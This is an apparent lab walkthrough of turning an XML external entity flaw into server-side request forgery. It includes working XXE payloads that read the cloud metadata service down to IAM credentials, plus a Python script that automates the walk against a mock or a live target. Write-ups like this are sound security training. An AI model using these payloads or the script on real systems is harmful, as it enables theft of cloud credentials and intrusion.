Exploiting XXE to perform SSRF attacks

Exploitation
The lab's "Check stock" feature parses XML input and echoes unexpected values back in the response. Because the parser resolves external entities and the expanded value is reflected, the XXE can be turned into an in-band SSRF against the internal metadata endpoint at http://169.254.169.254/.

Intercept a stock-check request in Burp, send it to Repeater, and replace the XML body with a document that declares an external entity pointing at the metadata endpoint and references it in productId:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

The response reflects the fetched content: the string latest, which is the top-level directory of the metadata service. Next, change the entity's SYSTEM URL to http://169.254.169.254/latest.

Each response reveals the next directory name. Append it to the URL in the entity declaration and resend, repeating until the response is no longer a directory listing but the credentials themselves. Following latest -> meta-data -> iam -> security-credentials -> admin leads to the API key (the IAM secret access key) at http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/, retrieved with:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
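
The manual walk above (resend, read the reflected directory name, append it, resend) can be automated. The script below is an added example, not part of the original walkthrough or the lab: it builds the same stockCheck payload for each path, extracts the reflected value, and descends depth-first until it reaches a node that is not a directory listing. To run offline it uses a constructed mock of the metadata tree and of the lab's response format (assumption: the lab reflects the entity value in an "Invalid product ID: ..." message). The live_send transport and the /product/stock endpoint are assumptions to be checked against the real lab in Burp.

```python
import re
from typing import Callable, Dict, Optional, Tuple

IMDS = "http://169.254.169.254"

# Constructed mock of the metadata tree (illustrative, not captured output).
# Directory listings are newline-separated names, as the metadata service returns them.
FAKE_IMDS: Dict[str, str] = {
    "/": "latest",
    "/latest": "meta-data",
    "/latest/meta-data": "ami-id\niam",
    "/latest/meta-data/ami-id": "ami-0123456789abcdef0",
    "/latest/meta-data/iam": "security-credentials",
    "/latest/meta-data/iam/security-credentials": "admin",
    "/latest/meta-data/iam/security-credentials/admin":
        '{"Code": "Success", "AccessKeyId": "AKIAEXAMPLE", "SecretAccessKey": "EXAMPLE/SECRET"}',
}


def xxe_payload(url: str) -> str:
    """Build the stockCheck document with an external entity that points at url."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "' + url + '"> ]>'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


def fake_stock_check(xml_body: str) -> Tuple[int, str]:
    """Mock of POSTing to the lab: resolves the SYSTEM URL against FAKE_IMDS and
    reflects the result the way the lab does (assumed format)."""
    m = re.search(r'SYSTEM "([^"]+)"', xml_body)
    if not m or not m.group(1).startswith(IMDS):
        return 400, '"XML parser exited with error"'
    path = m.group(1)[len(IMDS):] or "/"
    if path not in FAKE_IMDS:
        return 400, '"XML parser exited with error"'  # 404 from the metadata service
    return 400, '"Invalid product ID: ' + FAKE_IMDS[path] + '"'


def live_send(lab_base: str) -> Callable[[str], Tuple[int, str]]:
    """Transport for a real instance (assumption: the endpoint is /product/stock).
    lab_base is a placeholder such as "https://YOUR-LAB-ID.web-security-academy.net"."""
    import urllib.error
    import urllib.request

    def send(xml_body: str) -> Tuple[int, str]:
        req = urllib.request.Request(lab_base + "/product/stock", data=xml_body.encode(),
                                     headers={"Content-Type": "application/xml"})
        try:
            with urllib.request.urlopen(req, timeout=10) as r:
                return r.status, r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            return e.code, e.read().decode(errors="replace")
    return send


def reflected(body: str) -> Optional[str]:
    """Pull the entity's expanded value out of the error message, or None if none."""
    marker = "Invalid product ID: "
    i = body.find(marker)
    if i < 0:
        return None
    return body[i + len(marker):].rstrip().rstrip('"')


# A directory listing is one or more bare names, one per line.
LISTING = re.compile(r"^[\w.\-]+/?$")


def walk(send: Callable[[str], Tuple[int, str]], path: str = "/",
         depth: int = 0, max_depth: int = 8) -> Dict[str, str]:
    """Depth-first walk of the metadata tree through the XXE; returns {path: value}
    for every leaf. A node whose only child cannot be fetched is itself a leaf
    (e.g. /latest/meta-data/ami-id whose value is an AMI id, not a directory)."""
    found: Dict[str, str] = {}
    _, body = send(xxe_payload(IMDS + path))
    value = reflected(body)
    if value is None or depth > max_depth:
        return found
    names = [line.strip() for line in value.splitlines() if line.strip()]
    if names and all(LISTING.match(n) for n in names):
        for name in names:
            child = path.rstrip("/") + "/" + name.rstrip("/")
            sub = walk(send, child, depth + 1, max_depth)
            if sub:
                found.update(sub)
            elif len(names) == 1:
                found[path] = value  # descent failed: the value was data, not a listing
    else:
        found[path] = value
    return found


def find_credentials(leaves: Dict[str, str]) -> Optional[str]:
    """Return the path whose value carries an IAM secret, if any."""
    for p, v in leaves.items():
        if "SecretAccessKey" in v:
            return p
    return None


if __name__ == "__main__":
    leaves = walk(fake_stock_check)
    for p, v in leaves.items():
        print(p, "->", v)
```

Against a real lab instance, swap `fake_stock_check` for `live_send("https://YOUR-LAB-ID.web-security-academy.net")` and read the path returned by `find_credentials`; the leaf-detection heuristic (bare names per line means a directory) is what lets the walker stop at values such as an AMI id instead of looping.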


I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara